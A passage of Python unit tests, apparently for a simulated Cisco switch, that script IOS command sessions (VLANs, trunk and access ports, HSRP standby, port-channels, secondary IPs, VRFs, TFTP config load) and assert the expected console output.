t.write("copy tftp://1.2.3.4/my-file system:/running-config")
t.read("Destination filename [running-config]? ")
t.write_raw("\r")
t.wait_for("\r\n")
t.readln("Accessing tftp://1.2.3.4/my-file...")
t.readln("Done (or some official message...)")
t.read("my_switch#")
read_tftp.assert_called_with("1.2.3.4", "my-file")
@with_protocol
def test_command_show_run_int_vlan_empty(self, t):
enable(t)
t.write("terminal length 0")
t.read("my_switch#")
t.write("show run vlan 120")
t.readln("Building configuration...")
t.readln("")
t.readln("Current configuration:")
t.readln("end")
t.readln("")
t.read("my_switch#")
@with_protocol
def test_command_add_vlan(self, t):
enable(t)
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("vlan 123")
t.read("my_switch(config-vlan)#")
t.write("name shizzle")
t.read("my_switch(config-vlan)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
t.write("show run vlan 123")
t.readln("Building configuration...")
t.readln("")
t.readln("Current configuration:")
t.readln("!")
t.readln("vlan 123")
t.readln(" name shizzle")
t.readln("end")
t.readln("")
t.read("my_switch#")
remove_vlan(t, "123")
t.write("show running-config vlan 123")
t.readln("Building configuration...")
t.readln("")
t.readln("Current configuration:")
t.readln("end")
t.read("")
@with_protocol
def test_command_assign_access_vlan_to_port(self, t):
enable(t)
create_vlan(t, "123")
set_interface_on_vlan(t, "FastEthernet0/1", "123")
assert_interface_configuration(t, "Fa0/1", [
"interface FastEthernet0/1",
" switchport access vlan 123",
" switchport mode access",
"end"])
configuring_interface(t, "FastEthernet0/1", do="no switchport access vlan")
assert_interface_configuration(t, "Fa0/1", [
"interface FastEthernet0/1",
" switchport mode access",
"end"])
configuring_interface(t, "FastEthernet0/1", do="no switchport mode access")
assert_interface_configuration(t, "Fa0/1", [
"interface FastEthernet0/1",
"end"])
remove_vlan(t, "123")
@with_protocol
def test_show_vlan_brief(self, t):
enable(t)
create_vlan(t, "123")
create_vlan(t, "3333", "some-name")
create_vlan(t, "2222", "your-name-is-way-too-long-for-this-pretty-printed-interface-man")
set_interface_on_vlan(t, "FastEthernet0/1", "123")
t.write("show vlan brief")
t.readln("")
t.readln("VLAN Name Status Ports")
t.readln("---- -------------------------------- --------- -------------------------------")
t.readln("1 default active Fa0/2, Fa0/3, Fa0/4, Fa0/5")
t.readln(" Fa0/6, Fa0/7, Fa0/8, Fa0/9")
t.readln(" Fa0/10, Fa0/11, Fa0/12")
t.readln("123 VLAN123 active Fa0/1")
t.readln("2222 your-name-is-way-too-long-for-th active")
t.readln("3333 some-name active")
t.read("my_switch#")
revert_switchport_mode_access(t, "FastEthernet0/1")
remove_vlan(t, "123")
remove_vlan(t, "2222")
remove_vlan(t, "3333")
@with_protocol
def test_show_vlan(self, t):
enable(t)
create_vlan(t, "123")
create_vlan(t, "3333", "some-name")
create_vlan(t, "2222", "your-name-is-way-too-long-for-this-pretty-printed-interface-man")
set_interface_on_vlan(t, "FastEthernet0/1", "123")
t.write("show vlan")
t.readln("")
t.readln("VLAN Name Status Ports")
t.readln("---- -------------------------------- --------- -------------------------------")
t.readln("1 default active Fa0/2, Fa0/3, Fa0/4, Fa0/5")
t.readln(" Fa0/6, Fa0/7, Fa0/8, Fa0/9")
t.readln(" Fa0/10, Fa0/11, Fa0/12")
t.readln("123 VLAN123 active Fa0/1")
t.readln("2222 your-name-is-way-too-long-for-th active")
t.readln("3333 some-name active")
t.readln("")
t.readln("VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2")
t.readln("---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------")
t.readln("1 enet 100001 1500 - - - - - 0 0")
t.readln("123 enet 100123 1500 - - - - - 0 0")
t.readln("2222 enet 102222 1500 - - - - - 0 0")
t.readln("3333 enet 103333 1500 - - - - - 0 0")
t.readln("")
t.readln("Remote SPAN VLANs")
t.readln("------------------------------------------------------------------------------")
t.readln("")
t.readln("")
t.readln("Primary Secondary Type Ports")
t.readln("------- --------- ----------------- ------------------------------------------")
t.readln("")
t.read("my_switch#")
revert_switchport_mode_access(t, "FastEthernet0/1")
remove_vlan(t, "123")
remove_vlan(t, "2222")
remove_vlan(t, "3333")
@with_protocol
def test_shutting_down(self, t):
enable(t)
configuring_interface(t, "FastEthernet 0/3", do="shutdown")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" shutdown",
"end"])
configuring_interface(t, "FastEthernet 0/3", do="no shutdown")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
"end"])
@with_protocol
def test_configure_trunk_port(self, t):
enable(t)
configuring_interface(t, "Fa0/3", do="switchport mode trunk")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" switchport mode trunk",
"end"])
# not really added because all vlan are in trunk by default on cisco
configuring_interface(t, "Fa0/3", do="switchport trunk allowed vlan add 123")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" switchport mode trunk",
"end"])
configuring_interface(t, "Fa0/3", do="switchport trunk allowed vlan none")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" switchport trunk allowed vlan none",
" switchport mode trunk",
"end"])
configuring_interface(t, "Fa0/3", do="switchport trunk allowed vlan add 123")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" switchport trunk allowed vlan 123",
" switchport mode trunk",
"end"])
configuring_interface(t, "Fa0/3", do="switchport trunk allowed vlan add 124,126-128")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" switchport trunk allowed vlan 123,124,126-128",
" switchport mode trunk",
"end"])
configuring_interface(t, "Fa0/3", do="switchport trunk allowed vlan remove 123-124,127")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" switchport trunk allowed vlan 126,128",
" switchport mode trunk",
"end"])
configuring_interface(t, "Fa0/3", do="switchport trunk allowed vlan all")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" switchport mode trunk",
"end"])
configuring_interface(t, "Fa0/3", do="switchport trunk allowed vlan 123-124,127")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" switchport trunk allowed vlan 123,124,127",
" switchport mode trunk",
"end"])
configuring_interface(t, "Fa0/3", do="no switchport trunk allowed vlan")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" switchport mode trunk",
"end"])
configuring_interface(t, "Fa0/3", do="no switchport mode")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
"end"])
@with_protocol
def test_configure_native_vlan(self, t):
enable(t)
configuring_interface(t, "FastEthernet0/2", do="switchport trunk native vlan 555")
assert_interface_configuration(t, "Fa0/2", [
"interface FastEthernet0/2",
" switchport trunk native vlan 555",
"end"])
configuring_interface(t, "FastEthernet0/2", do="no switchport trunk native vlan")
assert_interface_configuration(t, "Fa0/2", [
"interface FastEthernet0/2",
"end"])
@with_protocol
def test_setup_an_interface(self, t):
enable(t)
create_vlan(t, "2999")
create_interface_vlan(t, "2999")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
"end"])
configuring_interface_vlan(t, "2999", do="description hey ho")
configuring_interface_vlan(t, "2999", do="ip address 1.1.1.2 255.255.255.0")
configuring_interface_vlan(t, "2999", do="standby 1 ip 1.1.1.1")
configuring_interface_vlan(t, "2999", do='standby 1 timers 5 15')
configuring_interface_vlan(t, "2999", do='standby 1 priority 110')
configuring_interface_vlan(t, "2999", do='standby 1 preempt delay minimum 60')
configuring_interface_vlan(t, "2999", do='standby 1 authentication VLAN2999')
configuring_interface_vlan(t, "2999", do='standby 1 track 10 decrement 50')
configuring_interface_vlan(t, "2999", do='standby 1 track 20 decrement 50')
configuring_interface_vlan(t, "2999", do='no ip proxy-arp')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" description hey ho",
" ip address 1.1.1.2 255.255.255.0",
" no ip proxy-arp",
" standby 1 ip 1.1.1.1",
" standby 1 timers 5 15",
" standby 1 priority 110",
" standby 1 preempt delay minimum 60",
" standby 1 authentication VLAN2999",
" standby 1 track 10 decrement 50",
" standby 1 track 20 decrement 50",
"end"])
configuring_interface_vlan(t, "2999", do="ip address 2.2.2.2 255.255.255.0")
configuring_interface_vlan(t, "2999", do="standby 1 ip 2.2.2.1")
configuring_interface_vlan(t, "2999", do="standby 1 ip 2.2.2.3 secondary")
configuring_interface_vlan(t, "2999", do="no standby 1 authentication")
configuring_interface_vlan(t, "2999", do="standby 1 preempt delay minimum 42")
configuring_interface_vlan(t, "2999", do="no standby 1 priority")
configuring_interface_vlan(t, "2999", do="no standby 1 timers")
configuring_interface_vlan(t, "2999", do="no standby 1 track 10")
configuring_interface_vlan(t, "2999", do="ip proxy-arp")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" description hey ho",
" ip address 2.2.2.2 255.255.255.0",
" standby 1 ip 2.2.2.1",
" standby 1 ip 2.2.2.3 secondary",
" standby 1 preempt delay minimum 42",
" standby 1 track 20 decrement 50",
"end"])
configuring_interface_vlan(t, "2999", do="no standby 1 ip 2.2.2.3")
configuring_interface_vlan(t, "2999", do="no standby 1 preempt delay")
configuring_interface_vlan(t, "2999", do="no standby 1 track 20")
configuring_interface_vlan(t, "2999", do="")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" description hey ho",
" ip address 2.2.2.2 255.255.255.0",
" standby 1 ip 2.2.2.1",
" standby 1 preempt",
"end"])
configuring_interface_vlan(t, "2999", do="no standby 1 ip 2.2.2.1")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" description hey ho",
" ip address 2.2.2.2 255.255.255.0",
" standby 1 preempt",
"end"])
configuring_interface_vlan(t, "2999", do="no standby 1")
configuring_interface_vlan(t, "2999", do="no description")
configuring_interface_vlan(t, "2999", do="")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" ip address 2.2.2.2 255.255.255.0",
"end"])
configuring(t, do="no interface vlan 2999")
t.write("show run int vlan 2999")
t.readln("\s*\^", regex=True)
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch#")
remove_vlan(t, "2999")
@with_protocol
def test_partial_standby_properties(self, t):
enable(t)
create_vlan(t, "2999")
create_interface_vlan(t, "2999")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
"end"])
configuring_interface_vlan(t, "2999", do='standby 1 timers 5 15')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
" standby 1 timers 5 15",
"end"])
configuring_interface_vlan(t, "2999", do="no standby 1 timers")
configuring_interface_vlan(t, "2999", do='standby 1 priority 110')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
" standby 1 priority 110",
"end"])
configuring_interface_vlan(t, "2999", do="no standby 1 priority")
configuring_interface_vlan(t, "2999", do='standby 1 preempt delay minimum 60')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
" standby 1 preempt delay minimum 60",
"end"])
configuring_interface_vlan(t, "2999", do="no standby 1 preempt")
configuring_interface_vlan(t, "2999", do='standby 1 authentication VLAN2999')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
" standby 1 authentication VLAN2999",
"end"])
configuring_interface_vlan(t, "2999", do="no standby 1 authentication")
configuring_interface_vlan(t, "2999", do='standby 1 track 10 decrement 50')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
" standby 1 track 10 decrement 50",
"end"])
configuring_interface_vlan(t, "2999", do="no standby 1 track 10")
configuring(t, do="no interface vlan 2999")
remove_vlan(t, "2999")
@with_protocol
def test_partial_standby_ip_definition(self, t):
enable(t)
create_vlan(t, "2999")
create_interface_vlan(t, "2999")
configuring_interface_vlan(t, "2999", do='standby 1 ip')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
" standby 1 ip",
"end"])
configuring_interface_vlan(t, "2999", do='no standby 1 ip')
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface vlan 2999")
t.read("my_switch(config-if)#")
t.write("standby 1 ip 1..1.1")
t.readln(" ^")
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch(config-if)#")
t.write("standby 1 ip 1.1.1.1")
t.readln("% Warning: address is not within a subnet on this interface")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
"end"])
configuring_interface_vlan(t, "2999", do="ip address 1.1.1.2 255.255.255.0")
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface vlan 2999")
t.read("my_switch(config-if)#")
t.write("standby 1 ip 2.1.1.1")
t.readln("% Warning: address is not within a subnet on this interface")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
configuring_interface_vlan(t, "2999", do='standby 1 ip 1.1.1.1')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" ip address 1.1.1.2 255.255.255.0",
" standby 1 ip 1.1.1.1",
"end"])
configuring_interface_vlan(t, "2999", do='standby 1 ip')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" ip address 1.1.1.2 255.255.255.0",
" standby 1 ip 1.1.1.1",
"end"])
configuring_interface_vlan(t, "2999", do="no ip address 1.1.1.2 255.255.255.0")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
" standby 1 ip 1.1.1.1",
"end"])
configuring_interface_vlan(t, "2999", do='no standby 1 ip 1.1.1.1')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
"end"])
configuring(t, do="no interface vlan 2999")
remove_vlan(t, "2999")
@with_protocol
def test_creating_a_port_channel(self, t):
enable(t)
create_port_channel_interface(t, '1')
configuring_port_channel(t, '1', 'description HELLO')
configuring_port_channel(t, '1', 'switchport trunk encapsulation dot1q')
configuring_port_channel(t, '1', 'switchport trunk native vlan 998')
configuring_port_channel(t, '1', 'switchport trunk allowed vlan 6,4087-4089,4091,4093')
configuring_port_channel(t, '1', 'switchport mode trunk')
assert_interface_configuration(t, 'Port-channel1', [
"interface Port-channel1",
" description HELLO",
" switchport trunk encapsulation dot1q",
" switchport trunk native vlan 998",
" switchport trunk allowed vlan 6,4087-4089,4091,4093",
" switchport mode trunk",
"end"
])
t.write("show etherchannel summary")
t.readln("Flags: D - down P - bundled in port-channel")
t.readln(" I - stand-alone s - suspended")
t.readln(" H - Hot-standby (LACP only)")
t.readln(" R - Layer3 S - Layer2")
t.readln(" U - in use f - failed to allocate aggregator")
t.readln("")
t.readln(" M - not in use, minimum links not met")
t.readln(" u - unsuitable for bundling")
t.readln(" w - waiting to be aggregated")
t.readln(" d - default port")
t.readln("")
t.readln("")
t.readln("Number of channel-groups in use: 1")
t.readln("Number of aggregators: 1")
t.readln("")
t.readln("Group Port-channel Protocol Ports")
t.readln("------+-------------+-----------+-----------------------------------------------")
t.readln("1 Po1(S) LACP ")
t.readln("")
t.read("my_switch#")
configuring(t, do="no interface port-channel 1")
t.write("show run int po1")
t.readln("\s*\^", regex=True)
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch#")
@with_protocol
def test_port_channel_is_automatically_created_when_adding_a_port_to_it(self, t):
enable(t)
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface FastEthernet0/1")
t.read("my_switch(config-if)#")
t.write("channel-group 2 mode active")
t.readln("Creating a port-channel interface Port-channel 2")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, 'fa0/1', [
"interface FastEthernet0/1",
" channel-group 2 mode active",
"end"
])
assert_interface_configuration(t, 'po2', [
"interface Port-channel2",
"end"
])
t.write("show etherchannel summary")
t.readln("Flags: D - down P - bundled in port-channel")
t.readln(" I - stand-alone s - suspended")
t.readln(" H - Hot-standby (LACP only)")
t.readln(" R - Layer3 S - Layer2")
t.readln(" U - in use f - failed to allocate aggregator")
t.readln("")
t.readln(" M - not in use, minimum links not met")
t.readln(" u - unsuitable for bundling")
t.readln(" w - waiting to be aggregated")
t.readln(" d - default port")
t.readln("")
t.readln("")
t.readln("Number of channel-groups in use: 1")
t.readln("Number of aggregators: 1")
t.readln("")
t.readln("Group Port-channel Protocol Ports")
t.readln("------+-------------+-----------+-----------------------------------------------")
t.readln("2 Po2(SU) LACP Fa0/1(P)")
t.readln("")
t.read("my_switch#")
configuring(t, do="no interface port-channel 2")
configuring_interface(t, interface="fa0/1", do="no channel-group 2 mode on")
assert_interface_configuration(t, "fa0/1", [
"interface FastEthernet0/1",
"end"
])
@with_protocol
def test_port_channel_is_not_automatically_created_when_adding_a_port_to_it_if_its_already_created(self, t):
enable(t)
create_port_channel_interface(t, '14')
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface FastEthernet0/1")
t.read("my_switch(config-if)#")
t.write("channel-group 14 mode active")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, "fa0/1", [
"interface FastEthernet0/1",
" channel-group 14 mode active",
"end"
])
configuring_interface(t, interface="fa0/1", do="no channel-group 14 mode on")
assert_interface_configuration(t, "fa0/1", [
"interface FastEthernet0/1",
"end"
])
configuring(t, do="no interface port-channel 14")
@with_protocol
def test_setting_secondary_ips(self, t):
enable(t)
create_interface_vlan(t, "2999")
configuring_interface_vlan(t, "2999", do="description hey ho")
configuring_interface_vlan(t, "2999", do="no ip redirects")
configuring_interface_vlan(t, "2999", do="ip address 1.1.1.1 255.255.255.0")
configuring_interface_vlan(t, "2999", do="ip address 2.2.2.1 255.255.255.0 secondary")
configuring_interface_vlan(t, "2999", do="ip address 4.4.4.1 255.255.255.0 secondary")
configuring_interface_vlan(t, "2999", do="ip address 3.3.3.1 255.255.255.0 secondary")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" description hey ho",
" ip address 2.2.2.1 255.255.255.0 secondary",
" ip address 4.4.4.1 255.255.255.0 secondary",
" ip address 3.3.3.1 255.255.255.0 secondary",
" ip address 1.1.1.1 255.255.255.0",
" no ip redirects",
"end"])
configuring_interface_vlan(t, "2999", do="no ip address")
configuring_interface_vlan(t, "2999", do="ip redirects")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" description hey ho",
" no ip address",
"end"])
configuring(t, do="no interface vlan 2999")
@with_protocol
def test_setting_access_group(self, t):
enable(t)
create_interface_vlan(t, "2999")
configuring_interface_vlan(t, "2999", do="ip access-group SHNITZLE in")
configuring_interface_vlan(t, "2999", do="ip access-group WHIZZLE out")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
" ip access-group SHNITZLE in",
" ip access-group WHIZZLE out",
"end"])
configuring_interface_vlan(t, "2999", do="no ip access-group in")
configuring_interface_vlan(t, "2999", do="no ip access-group WHIZZLE out")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
"end"])
configuring(t, do="no interface vlan 2999")
@with_protocol
def test_removing_ip_address(self, t):
enable(t)
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface vlan2999")
t.read("my_switch(config-if)#")
t.write("ip address 1.1.1.1 255.255.255.0")
t.read("my_switch(config-if)#")
t.write("ip address 2.2.2.2 255.255.255.0 secondary")
t.read("my_switch(config-if)#")
t.write("no ip address 1.1.1.1 255.255.255.0")
t.readln("Must delete secondary before deleting primary")
t.read("my_switch(config-if)#")
t.write("no ip address 2.2.2.2 255.255.255.0 secondary")
t.read("my_switch(config-if)#")
t.write("no ip address 1.1.1.1 255.255.255.0")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
"end"])
configuring(t, do="no interface vlan 2999")
@with_protocol
def test_show_ip_interface(self, t):
enable(t)
create_vlan(t, "1000")
create_interface_vlan(t, "1000")
create_vlan(t, "2000")
create_vlan(t, "3000")
create_interface_vlan(t, "3000")
configuring_interface_vlan(t, "3000", do="ip address 1.1.1.1 255.255.255.0")
create_interface_vlan(t, "4000")
configuring_interface_vlan(t, "4000", do="ip vrf forwarding DEFAULT-LAN")
configuring_interface_vlan(t, "4000", do="ip address 2.2.2.2 255.255.255.0")
configuring_interface_vlan(t, "4000", do="ip address 4.2.2.2 255.255.255.0 secondary")
configuring_interface_vlan(t, "4000", do="ip address 3.2.2.2 255.255.255.0 secondary")
configuring_interface_vlan(t, "4000", do="ip address 3.2.2.2 255.255.255.128 secondary")
configuring_interface_vlan(t, "4000", do="ip access-group shizzle in")
configuring_interface_vlan(t, "4000", do="ip access-group whizzle out")
t.write("show ip interface")
t.readln("Vlan1000 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("Vlan3000 is down, line protocol is down")
t.readln(" Internet address is 1.1.1.1/24")
t.readln(" Outgoing access list is not set")
t.readln(" Inbound access list is not set")
t.readln("Vlan4000 is down, line protocol is down")
t.readln(" Internet address is 2.2.2.2/24")
t.readln(" Secondary address 4.2.2.2/24")
t.readln(" Secondary address 3.2.2.2/25")
t.readln(" Outgoing access list is whizzle")
t.readln(" Inbound access list is shizzle")
t.readln(" VPN Routing/Forwarding \"DEFAULT-LAN\"")
t.readln("FastEthernet0/1 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/2 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/3 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/4 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/5 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/6 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/7 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/8 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/9 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/10 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/11 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/12 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.read("my_switch#")
t.write("show ip interface vlan 4000")
t.readln("Vlan4000 is down, line protocol is down")
t.readln(" Internet address is 2.2.2.2/24")
t.readln(" Secondary address 4.2.2.2/24")
t.readln(" Secondary address 3.2.2.2/25")
t.readln(" Outgoing access list is whizzle")
t.readln(" Inbound access list is shizzle")
t.readln(" VPN Routing/Forwarding \"DEFAULT-LAN\"")
t.read("my_switch#")
t.write("show ip interface vlan1000")
t.readln("Vlan1000 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.read("my_switch#")
configuring(t, do="no interface vlan 1000")
configuring(t, do="no interface vlan 3000")
configuring(t, do="no interface vlan 4000")
remove_vlan(t, "1000")
remove_vlan(t, "2000")
remove_vlan(t, "3000")
@with_protocol
def test_assigning_a_secondary_ip_as_the_primary_removes_it_from_secondary_and_removes_the_primary(self, t):
enable(t)
create_interface_vlan(t, "4000")
configuring_interface_vlan(t, "4000", do="ip address 2.2.2.2 255.255.255.0")
configuring_interface_vlan(t, "4000", do="ip address 4.2.2.2 255.255.255.0 secondary")
configuring_interface_vlan(t, "4000", do="ip address 3.2.2.2 255.255.255.0 secondary")
configuring_interface_vlan(t, "4000", do="ip address 3.2.2.2 255.255.255.128")
assert_interface_configuration(t, "Vlan4000", [
"interface Vlan4000",
" ip address 4.2.2.2 255.255.255.0 secondary",
" ip address 3.2.2.2 255.255.255.128",
"end"])
configuring(t, do="no interface vlan 4000")
@with_protocol
def test_overlapping_ips(self, t):
enable(t)
create_vlan(t, "1000")
create_interface_vlan(t, "1000")
create_vlan(t, "2000")
create_interface_vlan(t, "2000")
configuring_interface_vlan(t, "1000", do="ip address 2.2.2.2 255.255.255.0")
configuring_interface_vlan(t, "1000", do="ip address 3.3.3.3 255.255.255.0 secondary")
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface vlan2000")
t.read("my_switch(config-if)#")
t.write("ip address 2.2.2.75 255.255.255.128")
t.readln("% 2.2.2.0 overlaps with secondary address on Vlan1000")
t.read("my_switch(config-if)#")
t.write("ip address 3.3.3.4 255.255.255.128")
t.readln("% 3.3.3.0 is assigned as a secondary address on Vlan1000")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
configuring(t, do="no interface vlan 2000")
remove_vlan(t, "2000")
configuring(t, do="no interface vlan 1000")
remove_vlan(t, "1000")
@with_protocol
def test_unknown_ip_interface(self, t):
enable(t)
t.write("show ip interface Vlan2345")
t.readln(" ^")
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch#")
@with_protocol
def test_removing_ip_needs_to_compare_objects_better(self, t):
enable(t)
create_vlan(t, "1000")
create_interface_vlan(t, "1000")
configuring_interface_vlan(t, "1000", do="ip address 1.1.1.1 255.255.255.0")
configuring_interface_vlan(t, "1000", do="ip address 1.1.1.2 255.255.255.0 secondary")
configuring_interface_vlan(t, "1000", do="ip address 1.1.1.3 255.255.255.0 secondary")
configuring_interface_vlan(t, "1000", do="no ip address 1.1.1.3 255.255.255.0 secondary")
t.write("show ip interface vlan 1000")
t.readln("Vlan1000 is down, line protocol is down")
t.readln(" Internet address is 1.1.1.1/24")
t.readln(" Secondary address 1.1.1.2/24")
t.readln(" Outgoing access list is not set")
t.readln(" Inbound access list is not set")
t.read("my_switch#")
configuring(t, do="no interface vlan 1000")
remove_vlan(t, "1000")
@with_protocol
def test_extreme_vlan_range(self, t):
enable(t)
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("vlan -1")
t.readln("Command rejected: Bad VLAN list - character #1 ('-') delimits a VLAN number")
t.readln(" which is out of the range 1..4094.")
t.read("my_switch(config)#")
t.write("vlan 0")
t.readln("Command rejected: Bad VLAN list - character #X (EOL) delimits a VLAN")
t.readln("number which is out of the range 1..4094.")
t.read("my_switch(config)#")
t.write("vlan 1")
t.read("my_switch(config-vlan)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("vlan 4094")
t.read("my_switch(config-vlan)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("no vlan 4094")
t.read("my_switch(config)#")
t.write("vlan 4095")
t.readln("Command rejected: Bad VLAN list - character #X (EOL) delimits a VLAN")
t.readln("number which is out of the range 1..4094.")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
@with_protocol
def test_full_running_config_and_pipe_begin_support(self, t):
enable(t)
create_vlan(t, "1000", name="hello")
create_interface_vlan(t, "1000")
configuring_interface(t, "Fa0/2", do="switchport mode trunk")
configuring_interface(t, "Fa0/2", do="switchport trunk allowed vlan 125")
t.write("show running | beg vlan")
t.readln("vlan 1")
t.readln("!")
t.readln("vlan 1000")
t.readln(" name hello")
t.readln("!")
t.readln("interface FastEthernet0/1")
t.readln("!")
t.readln("interface FastEthernet0/2")
t.readln(" switchport trunk allowed vlan 125")
t.readln(" switchport mode trunk")
t.readln("!")
t.readln("interface FastEthernet0/3")
t.readln("!")
t.readln("interface FastEthernet0/4")
t.readln("!")
t.readln("interface FastEthernet0/5")
t.readln("!")
t.readln("interface FastEthernet0/6")
t.readln("!")
t.readln("interface FastEthernet0/7")
t.readln("!")
t.readln("interface FastEthernet0/8")
t.readln("!")
t.readln("interface FastEthernet0/9")
t.readln("!")
t.readln("interface FastEthernet0/10")
t.readln("!")
t.readln("interface FastEthernet0/11")
t.readln("!")
t.readln("interface FastEthernet0/12")
t.readln("!")
t.readln("interface Vlan1000")
t.readln(" no ip address")
t.readln("!")
t.readln("end")
t.readln("")
t.read("my_switch#")
configuring_interface(t, "Fa0/2", do="no switchport mode trunk")
configuring_interface(t, "Fa0/2", do="no switchport trunk allowed vlan")
configuring(t, do="no interface vlan 1000")
remove_vlan(t, "1000")
@with_protocol
def test_pipe_inc_support(self, t):
enable(t)
create_vlan(t, "1000", name="hello")
t.write("show running | inc vlan")
t.readln("vlan 1")
t.readln("vlan 1000")
t.read("my_switch#")
remove_vlan(t, "1000")
@with_protocol
def test_ip_vrf(self, t):
enable(t)
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("ip vrf SOME-LAN")
t.read("my_switch(config-vrf)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("no ip vrf SOME-LAN")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
@with_protocol
def test_ip_vrf_forwarding(self, t):
enable(t)
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("ip vrf SOME-LAN")
t.read("my_switch(config-vrf)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("interface Fa0/2")
t.read("my_switch(config-if)#")
